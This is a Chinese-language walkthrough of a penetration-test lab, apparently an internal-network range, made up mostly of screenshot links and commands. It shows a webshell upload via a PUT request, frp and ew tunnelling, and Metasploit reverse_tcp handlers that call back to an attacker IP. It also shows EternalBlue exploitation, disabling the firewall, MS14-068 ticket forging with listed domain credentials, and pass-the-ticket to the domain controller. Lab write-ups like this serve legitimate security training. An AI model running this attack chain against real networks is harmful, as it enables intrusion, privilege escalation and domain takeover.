信息收集
data:image/s3,"s3://crabby-images/31457/3145798da9883aec5b4ff12670d609ed4edfc6f0" alt=""
data:image/s3,"s3://crabby-images/1dc0f/1dc0f2ec83e4367f16938d05e861e65a8f75f041" alt=""
data:image/s3,"s3://crabby-images/dd23f/dd23fe4b5081499da9e5045de0f19228e2fbb815" alt=""
data:image/s3,"s3://crabby-images/9bc4f/9bc4f2486549498184889af78d44d49902ad87ea" alt=""
2001端口
data:image/s3,"s3://crabby-images/d5faf/d5faf316a6ce0d90181a69642d714e9b264a9c32" alt=""
data:image/s3,"s3://crabby-images/4cffe/4cffe2318736003b15b8b74f576c45b8f9c65a35" alt=""
data:image/s3,"s3://crabby-images/653e8/653e887ae2960905bea5b896706c793a0e127445" alt=""
data:image/s3,"s3://crabby-images/861d0/861d0b0515a5d631b8cab224a714a984e9dc6f80" alt=""
2002端口
data:image/s3,"s3://crabby-images/dce96/dce96906f6fe867d19609ae1148afbb77d7fcd37" alt=""
抓包修改为PUT请求,上传木马,前面加/
data:image/s3,"s3://crabby-images/3639d/3639daafd6aa9d31a05e8e9f9511d0b5d72ed482" alt=""
data:image/s3,"s3://crabby-images/3056d/3056da02027472ce8deaba08f687b70f92b11ca5" alt=""
data:image/s3,"s3://crabby-images/c8036/c8036cf4242769538c9c82879afd7539a9ae3863" alt=""
python -c 'import pty; pty.spawn("/bin/bash")'
data:image/s3,"s3://crabby-images/54c72/54c727b889904fb8021d427c500046e2c9a15746" alt=""
data:image/s3,"s3://crabby-images/a3861/a38618802d0fa222943d088e4bf636961f9ae515" alt=""
添加代理
个人原因 重置
kali IP地址改为 192.168.1.128
centos IP地址为192.168.1.130
修改客户端
data:image/s3,"s3://crabby-images/90550/905509207e39a06f9d447640e2d9c11781e3a6f8" alt=""
服务端
data:image/s3,"s3://crabby-images/11b12/11b12177a4a696de019e33ccbedd66344fa28ff0" alt=""
./frpc -c./frpc.ini
./frps-c./frps.ini
data:image/s3,"s3://crabby-images/fd6e9/fd6e970150b1145d70d349a07ccc79d9a0699106" alt=""
data:image/s3,"s3://crabby-images/76f5e/76f5e439416e773cf9648423d0563dd306b1af07" alt=""
或者ew代理
chmod 777 ew_for_linux64
./ew_for_linux64 -s ssocksd -l 1080
proxychains代理
vi /etc/proxychains.conf
data:image/s3,"s3://crabby-images/dba75/dba759c54541525fb8b6588d7516ada68f0a97d4" alt=""
proxychains msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.1.128
set lport 4440
run
route add 192.168.183.0 255.255.255.0 2
route print
data:image/s3,"s3://crabby-images/2491f/2491fcaad9401d3f88460327595423213fb5d941" alt=""
主机探测
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.183.1/24
set threads 10
run
data:image/s3,"s3://crabby-images/772b7/772b75f54e97a07e961c525c874d42fd919df388" alt=""
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.183.128-132
rhosts => 192.168.183.128-132
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
data:image/s3,"s3://crabby-images/2d403/2d4032d2a786c2646ed855022ab3662021b9596c" alt=""
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.129
msf5 exploit(windows/smb/ms17_010_eternalblue) >set lhost 192.168.1.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
data:image/s3,"s3://crabby-images/855e5/855e506ddf3d300960d50a02d571c2a9903dbfd6" alt=""
set payload windows/x64/shell/bind_tcp
data:image/s3,"s3://crabby-images/ab299/ab299fea9316cfc975f56e6583836269a2580386" alt=""
data:image/s3,"s3://crabby-images/858fe/858fe1fbc7aea4c8a2e73c21eddbb9c85474befd" alt=""
只得到了shell
65001 UTF-8代码页 解决乱码
chcp 65001
data:image/s3,"s3://crabby-images/5234e/5234e0d3ed334765b84e5c005e69e82d8b4318d6" alt=""
netsh firewall set opmode disable 关闭防火墙
data:image/s3,"s3://crabby-images/b9957/b99577b86ce3cb6daac40f5309b5d41c2932868f" alt=""
ipconfig
data:image/s3,"s3://crabby-images/c3a2d/c3a2dd74a3b8dff09f086711afd94f21856d9acd" alt=""
查看域内机器
net view /domain.demo
data:image/s3,"s3://crabby-images/7f390/7f39047bff0959f2d4dc8e9be611bfaeb6addbb6" alt=""
data:image/s3,"s3://crabby-images/29b24/29b24592d7d35190cfb889b04c59108af391e16e" alt=""
查看桌面
data:image/s3,"s3://crabby-images/b9b43/b9b434c63acdde9faf6d73c40b1c957a563e95d2" alt=""
ms14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
data:image/s3,"s3://crabby-images/b47a7/b47a7bc528d005c33fd361d5ad45824385cc3706" alt=""
kerberos::purge
data:image/s3,"s3://crabby-images/93ae1/93ae1b98c316398c1f16b1d2ce3d2c3bdc94d1b4" alt=""
kerberos::list
kerberos::ptc TGT_douser@demo.com.ccache
data:image/s3,"s3://crabby-images/3b173/3b1733b634836c08c7d20b5b7a1d27af4a58f27d" alt=""
获取域控文件
dir \WIN-ENS2VR5TR3Nc$
data:image/s3,"s3://crabby-images/d442c/d442c40cac6a27c407d11917d40c8b6295940297" alt=""
使用PSTools目录下的PsExec.exe获取shell 失败
PsExec64.exe \WIN-ENS2VR5TR3N cmd.exe
data:image/s3,"s3://crabby-images/27bb4/27bb4b161265e4c8e9480731633e2c78cb306a16" alt=""
参考文章
https://www.cnblogs.com/yuzly/p/10859520.html
https://blog.51cto.com/loveemily/2163147
https://blog.csdn.net/deng_xj/article/details/88952420
https://www.cnblogs.com/PANDA-Mosen/p/13118210.html